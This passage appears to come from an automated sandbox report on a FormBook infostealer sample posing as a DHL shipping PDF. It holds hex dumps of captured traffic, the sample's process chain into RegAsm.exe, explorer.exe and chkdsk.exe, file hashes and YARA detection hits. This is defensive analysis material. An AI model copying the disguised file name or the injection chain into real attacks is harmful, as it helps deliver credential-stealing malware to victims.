                                            Data Ascii: QYu#4{dv^`lV_t_S>DX6pMu0mz3xG%.Jw[IBHyUg[f{[w~-gkp\h-B@7,O^~cy@Q}`Cy9jEh?xy&"n_ywp=T{#}Di@
                                            2021-09-27 18:36:57 UTC453INData Raw: 73 37 22 d2 83 28 93 41 c7 2d 55 48 4e 11 dc 26 fd df ce 49 c5 ff 12 c7 db c7 5e cb 3b e0 ed d9 66 34 db 7f 10 10 93 10 db 0d 44 3f 0e 61 46 05 d9 49 8d 33 38 68 79 5b d8 ef ef 7d ed 03 22 f9 a2 95 2c 0d 1a 08 b0 8f 2d 10 55 1e 2f eb c9 53 07 b1 35 6e 7e 74 35 8e a3 6a ec 4d ac be aa 9d a4 06 00 e9 2e b6 8d e6 11 7f 90 19 30 6b d6 21 5c 83 f6 6a 54 69 87 6b 20 61 e5 d6 5e 2e b7 0d 72 fe 78 79 18 20 11 a1 2c 46 b4 f5 4f 59 72 5f f7 88 c9 19 09 e9 00 13 7d c0 a6 15 9b e5 75 89 18 5b af 04 f5 f4 4a be d4 83 f5 dc 87 09 75 a8 f3 fa 79 b3 8f 2a ab d3 06 10 f4 c9 dd 21 ec f8 97 b6 9e 75 12 f7 6f ff ab 5a 93 d3 cd e9 0a 06 2b 51 b9 ea 42 e5 f7 65 ce 8b a8 07 19 de fc 6a 0b 8d 4a 1b 43 bc 47 31 3d 4e 0a c4 49 54 a6 f9 56 7a 8b 24 d7 93 98 b1 10 e3 09 59 71 85 4d
                                            Data Ascii: s7"(A-UHN&I^;f4D?aFI38hy[}",-U/S5n~t5jM.0k!\jTik a^.rxy ,FOYr_}u[Juy*!uoZ+QBejJCG1=NITVz$YqM
                                            2021-09-27 18:36:57 UTC469INData Raw: cd ad d0 ae 51 da 9f 5a c2 60 b4 b1 40 3d 7f 56 7e 7a b2 c3 27 2f b1 c6 99 e3 55 84 74 4f f9 66 17 3c d8 98 92 90 d9 b5 8e 4e 00 c5 69 b3 c1 21 de 33 93 dd 2d 3b de 9d 31 bb 78 54 9b b5 dc 0e 72 cb 56 7a 1c 02 aa f6 ea 15 7d f2 80 d8 6f 0a 64 ab 29 1a 18 69 1a 0e 6b ad c9 cc 6c a7 19 68 b3 59 7b b3 74 08 2c af 76 3c 18 23 47 b2 b5 62 10 3c 7f 89 a1 4b 3a 25 cf fe dd 4e 91 f8 0b 8f a1 cd 62 02 bb de 14 ef 83 e6 9b 87 5c d4 cb 8b ca 68 23 e9 f2 c6 c9 4c ff 7b bd db ed 6a 97 61 5d b3 b7 59 b3 05 4f f2 d4 15 91 31 74 33 04 d9 9b cd 0c 49 f3 b4 6c 35 0d a8 97 7a 07 e7 a5 6a 2d b8 1f 20 15 a9 f8 75 55 67 01 e7 b5 3b 00 00 22 31 d8 49 a7 ab b7 86 92 83 bf dd cf 3e c5 c9 4d 0e e8 ad 25 8b 07 41 80 4c 11 2e 6d a7 2d ab ec 83 7c 78 9c 89 01 81 7b a4 25 1c 3b 70 b3
                                            Data Ascii: QZ`@=V~z'/UtOf<Ni!3-;1xTrVz}od)iklhY{t,v<#Gb<K:%Nb\h#L{ja]YO1t3Il5zj- uUg;"1I>M%AL.m-|x{%;p
                                            2021-09-27 18:36:57 UTC485INData Raw: d1 a6 98 f0 1b 82 5d 10 77 00 96 e2 34 50 13 30 16 a9 68 2b 04 2d 6b c6 20 07 ba f9 18 86 0f e8 c0 a8 19 c0 25 39 17 0d c5 f0 53 a5 0b d7 93 f8 85 58 de 16 41 99 3d dc 32 53 75 f4 29 d5 ca 95 d7 89 c9 9d c9 d9 70 b2 72 22 09 3a db 98 cf 0d 01 ad 55 b2 e4 a7 8f ad 77 82 08 7d 93 9b 56 c3 36 ba d4 b1 e1 be 03 3e 79 ff ae be 7d 9f 98 d0 50 5a 26 87 39 8d 75 e1 3e 3b d3 eb 5a e9 a2 2b 20 29 0a 8c 5c 19 d7 3b 0c fe 1b eb 16 07 3e 86 70 d4 ba cc 81 a1 be bf d2 7e 11 45 7d 3b 00 05 a6 73 30 08 71 69 e0 c8 9a b9 7d 92 25 b3 75 03 ce c8 57 e3 17 0b 44 ac 71 99 75 ec 9b 87 9c 1d 3e f6 a4 47 99 2b 8a 6d 4d fb 20 57 74 a2 fe f8 52 76 32 99 3d 45 a6 81 d4 31 46 ee 2d ba ef d1 27 ff 58 06 34 29 9d 06 a2 aa ef 83 a5 b0 73 6e ce c7 b1 8a 4b 21 e6 16 d8 15 47 94 7a f0 45
                                            Data Ascii: ]w4P0h+-k %9SXA=2Su)pr":Uw}V6>y}PZ&9u>;Z+ )\;>p~E};s0qi}%uWDqu>G+mM WtRv2=E1F-'X4)snK!GzE
                                            2021-09-27 18:36:57 UTC501INData Raw: f6 22 68 70 ff c8 8c c8 08 8b 53 57 e0 aa 59 ba f0 7e db 74 ba 56 86 64 a1 b6 d7 a7 1c 76 6c 8d 7d 66 3d b5 c3 f5 16 6e 6b c3 4e c8 c2 92 fb e3 45 1a f5 06 2c 78 db 36 f1 6b 5d ad 03 c1 7d fe 83 86 87 ae 8e a8 a0 99 54 a8 a5 7e 60 e0 ef 8e c1 9c 01 be fa 42 9e 9c 3a 1c f9 cb 35 0f 0c 5a 37 6f 6b ba 64 d0 68 3d 7d cc d5 5d 0b 70 ad 07 53 d0 bd 6e 9f 33 49 90 55 e0 fd a4 44 02 09 dc 74 e0 01 62 c8 ae 42 08 98 f2 21 04 6e 54 a1 b7 43 54 e6 ee 44 2d a5 50 e7 77 9c f4 73 0d d5 5e 81 49 f5 7b 69 4a 93 88 9d 77 e0 3b 7a 41 89 33 d4 98 96 61 c9 86 c5 1c 4b c1 bd 7b 49 9a 70 a9 ae ac ec f3 82 fb 01 cd 5d c4 88 0a db d0 fb 2c 13 33 f0 58 75 2f af 29 84 07 73 07 6f 6a 18 25 e0 dc 3f 4f a3 a4 3b fb b7 91 03 0c e0 73 a9 d4 b1 5d 8b ba 58 b5 44 0d 01 0a 50 de 11 c3 72
                                            Data Ascii: "hpSWY~tVdvl}f=nkNE,x6k]}T~`B:5Z7okdh=}]pSn3IUDtbB!nTCTD-Pws^I{iJw;zA3aK{Ip],3Xu/)soj%?O;s]XDPr
                                            2021-09-27 18:36:57 UTC517INData Raw: 8b a3 d7 0c 38 47 8d f5 f0 8f 06 0c a3 16 cb b4 60 6f dd 92 95 0d a4 73 57 ec 4a 16 d7 7e 71 36 36 d1 f0 61 9c 7b 46 56 5c ff 53 ad 32 c0 f4 fd cb ad 2b da 12 0b 2c 18 57 ff 34 c3 97 e3 e6 3f 1c 3b fa 49 88 f3 24 96 2c 48 d9 4c 38 1d 33 35 ff 93 a9 95 16 b3 0e 61 aa b0 d4 36 3a 57 fb 8c 5e ab f0 a6 52 7a 35 a2 df 31 47 01 4c b9 44 0b e4 51 75 a7 75 ac e5 59 33 70 13 8d 60 92 52 8a 59 88 e6 ad cb 6e 9b 5f 07 84 4e 66 44 2d 52 21 a2 35 ee 2c 1d 1a 3a 89 c5 d0 01 05 c2 2a c1 47 ac 29 4a c5 0e ff 60 29 00 25 c6 d7 80 90 f5 b0 ec cc cd 3a cc f5 7c 76 5a 9e cb c6 8b 11 b1 f2 66 83 04 82 01 a0 80 96 4d ca 0e 23 6e 4a bd 71 35 61 95 bf 04 b9 67 41 e5 58 ae a3 03 ec b5 80 03 97 29 d5 4c 41 2e 87 15 e5 5e a9 3d cb fe 16 08 44 2b 83 c0 f5 73 24 d9 03 94 da f2 08 95
                                            Data Ascii: 8G`osWJ~q66a{FV\S2+,W4?;I$,HL835a6:W^Rz51GLDQuuY3p`RYn_NfD-R!5,:*G)J`)%:|vZfM#nJq5agAX)LA.^=D+s$
                                            2021-09-27 18:36:57 UTC533INData Raw: 8a 8b db 6b b1 e0 c4 5d f4 9c a9 1a c9 e5 7d 74 1f 5c 40 f5 c7 74 5d a8 93 09 dd c5 33 89 61 2d 18 ae e9 90 02 4d c5 aa a2 0b 79 5d 5f 11 e6 b4 d5 e1 e0 9b 96 23 4e b8 51 9d 22 bb 55 aa 61 0f 9c 1c 94 75 65 99 7a f4 bc 70 f2 76 5c 67 ed ef 66 46 41 49 ed 01 bf e1 a9 ef 71 d7 5f a1 3b e1 a1 ed 0e cd 66 d7 b2 f5 73 87 70 e6 f0 93 63 f9 96 ce 0b b1 ee 35 bc 72 84 57 d0 14 98 67 34 d4 ed a3 fa 40 b9 5f e5 36 93 b3 03 0f 07 76 5f ec 15 0c 57 b1 38 d1 24 af cc 46 85 bf f2 0a 6a 94 f0 e2 57 64 85 37 95 42 bc 48 af 86 f4 c2 6d 0f 19 9e 0e 82 64 3b 30 4b 74 8d b4 06 19 4b 71 c0 d5 69 09 a9 82 a5 53 6d f8 03 8a 1a e3 41 de 9b e3 00 ec f8 fe 4b c2 84 04 cf 85 14 4f 5a 90 c7 95 dd 4f 23 f9 f8 d4 fa 84 54 c2 9c 63 84 60 21 67 29 00 5c ed 19 1e 7d 65 0b 79 9d 6b 9f 2c
                                            Data Ascii: k]}t\@t]3a-My]_#NQ"Uauezpv\gfFAIq_;fspc5rWg4@_6v_W8$FjWd7BHmd;0KtKqiSmAKOZO#Tc`!g)\}eyk,
                                            2021-09-27 18:36:57 UTC549INData Raw: a7 a9 75 31 b9 9a 6b 34 50 3c 01 bd b4 35 af cf 6a 46 c6 3e d4 95 47 15 29 ff 7f 73 8f c6 49 86 fb c2 1f 2a 34 65 b6 93 a3 d2 f0 56 88 f4 56 fb be c2 1a d6 bd 7f 55 97 39 44 1e 5e 92 cc 73 ad 00 51 52 aa 8e 75 dc 2b c2 be 61 9e 9f d9 68 bd 44 2a 01 f2 ef 5d a6 cb 9c 9f e2 55 bd fd 07 50 00 dd a4 d1 5f ce b7 cc 21 06 1c 28 ba 02 79 33 c4 1b c6 c2 51 fc 13 bf 99 02 16 4d 9d c9 c1 a9 ff 99 0f 67 c6 5e da 73 55 9d c2 39 e5 28 45 a8 88 6d 23 d5 c1 cb 62 77 00 65 f9 8b e2 5c d0 d6 2c ab 3f 4c 81 b1 8e 18 16 83 d1 4c 38 e4 2d fc d8 d6 19 60 b4 03 2f 7f f9 f3 e5 28 21 8f 46 6e a5 43 df 3e ab 7f c8 82 0c b9 41 1b 85 d0 29 e6 c5 0c ea 14 7c 57 ed ff f2 9c cf 56 81 77 c1 e5 85 0f 29 62 6a 27 03 80 e2 c0 31 ed 7f b0 be 61 36 a5 f0 0e 0a d5 49 55 a5 e1 9b 02 89 6b 7f
                                            Data Ascii: u1k4P<5jF>G)sI*4eVVU9D^sQRu+ahD*]UP_!(y3QMg^sU9(Em#bwe\,?LL8-`/(!FnC>A)|WVw)bj'1a6IUk
                                            2021-09-27 18:36:57 UTC565INData Raw: 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff 42 42 42 ff 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff 42 42 42 ff
                                            Data Ascii: BBBBBBBBBBBBBBBBBBBBBBB


                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            System Behavior

                                            General

                                            Start time:20:36:53
                                            Start date:27/09/2021
                                            Path:C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe'
                                            Imagebase:0xbc0000
                                            File size:11776 bytes
                                            MD5 hash:690684B6B6A432EF5F8B34B67653D4BE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:20:36:54
                                            Start date:27/09/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7f20f0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:20:37:04
                                            Start date:27/09/2021
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            Imagebase:0x900000
                                            File size:64616 bytes
                                            MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:20:37:06
                                            Start date:27/09/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff720ea0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:20:37:35
                                            Start date:27/09/2021
                                            Path:C:\Windows\SysWOW64\autoconv.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\SysWOW64\autoconv.exe
                                            Imagebase:0xd10000
                                            File size:851968 bytes
                                            MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:20:37:51
                                            Start date:27/09/2021
                                            Path:C:\Windows\SysWOW64\chkdsk.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                            Imagebase:0x2b0000
                                            File size:23040 bytes
                                            MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Disassembly

                                            Code Analysis
